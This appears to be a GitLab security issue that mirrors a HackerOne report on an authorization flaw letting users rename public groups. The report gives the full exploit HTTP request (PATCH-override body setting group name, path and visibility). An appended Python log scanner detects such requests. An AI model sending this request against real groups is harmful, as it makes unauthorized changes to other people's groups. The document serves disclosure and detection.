A user can change the name and path of some public GitLab groups

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2035687 by zeb0x01 on 2023-06-23, assigned to @ottilia_westerlund:

Report

Summary

The following vulnerability allows an attacker to change a public GitLab group's name with just a POST request.

Steps to reproduce
  1. Send the following request with cookies.
     POST /-/subscriptions/groups/<GROUP_NAME> HTTP/2
     Host: gitlab.com
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: https://gitlab.com/-/subscriptions/groups/gitlab-org
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 210
     Origin: https://gitlab.com
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: document
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1
     Te: trailers

     _method=patch&authenticity_token=[REDACTED]&new_user=true&group%5Bname%5D=<group_name>&group%5Bpath%5D=<group_path>&group%5Bvisibility_level%5D=20

Impact

Unauthorized access / change leading to change in group name of any public group

Relevant logs and/or screenshots

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Edited by Costel Maxim
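
A defender-side check for the request shape in the report, added here as an example and not part of the original report or GitLab's code: it scans JSON request logs for state-changing requests to `/-/subscriptions/groups/...` that carry `group[name]`, `group[path]` or `group[visibility_level]`. The log field names (`time`, `method`, `path`, `username`, `params` as a key/value list) are assumed to follow GitLab's `production_json.log` layout, and the sample lines are constructed.

```python
import json
import re

# Endpoint from the report; the group path may contain "/" for subgroups.
SUBSCRIPTION_GROUP_PATH = re.compile(r"^/-/subscriptions/groups/(?P<group>.+)$")
# Group attributes the reported request body tried to set.
SENSITIVE_KEYS = {"name", "path", "visibility_level"}


def group_params(params):
    """Return the nested group[...] attributes from a logged params list."""
    found = {}
    for item in params or []:
        if item.get("key") == "group" and isinstance(item.get("value"), dict):
            found.update(item["value"])
    return found


def flag_group_rewrites(log_lines):
    """Return (time, username, group, changed_attrs) for each matching request."""
    hits = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        match = SUBSCRIPTION_GROUP_PATH.match(event.get("path") or "")
        # Assumption: a POST carrying _method=patch may be logged as POST or PATCH.
        if not match or event.get("method") not in ("POST", "PATCH", "PUT"):
            continue
        changed = SENSITIVE_KEYS & group_params(event.get("params")).keys()
        if changed:
            hits.append((event.get("time"), event.get("username"),
                         match.group("group"), sorted(changed)))
    return hits


# Constructed sample lines, not taken from any real instance.
SAMPLE = [
    '{"time":"2023-06-23T10:00:00Z","method":"GET","path":"/-/subscriptions/groups/example-group","username":"alice","params":[]}',
    '{"time":"2023-06-23T10:01:00Z","method":"PATCH","path":"/-/subscriptions/groups/example-group","username":"mallory","params":[{"key":"new_user","value":"true"},{"key":"group","value":{"name":"renamed","path":"renamed","visibility_level":"20"}}]}',
    '{"time":"2023-06-23T10:02:00Z","method":"PATCH","path":"/groups/example-group","username":"owner","params":[{"key":"group","value":{"name":"ok"}}]}',
    'not json',
]

if __name__ == "__main__":
    for hit in flag_group_rewrites(SAMPLE):
        print(hit)
```

Each hit still needs to be compared against the group's membership, since the same endpoint can be reached by a user who is entitled to edit that group.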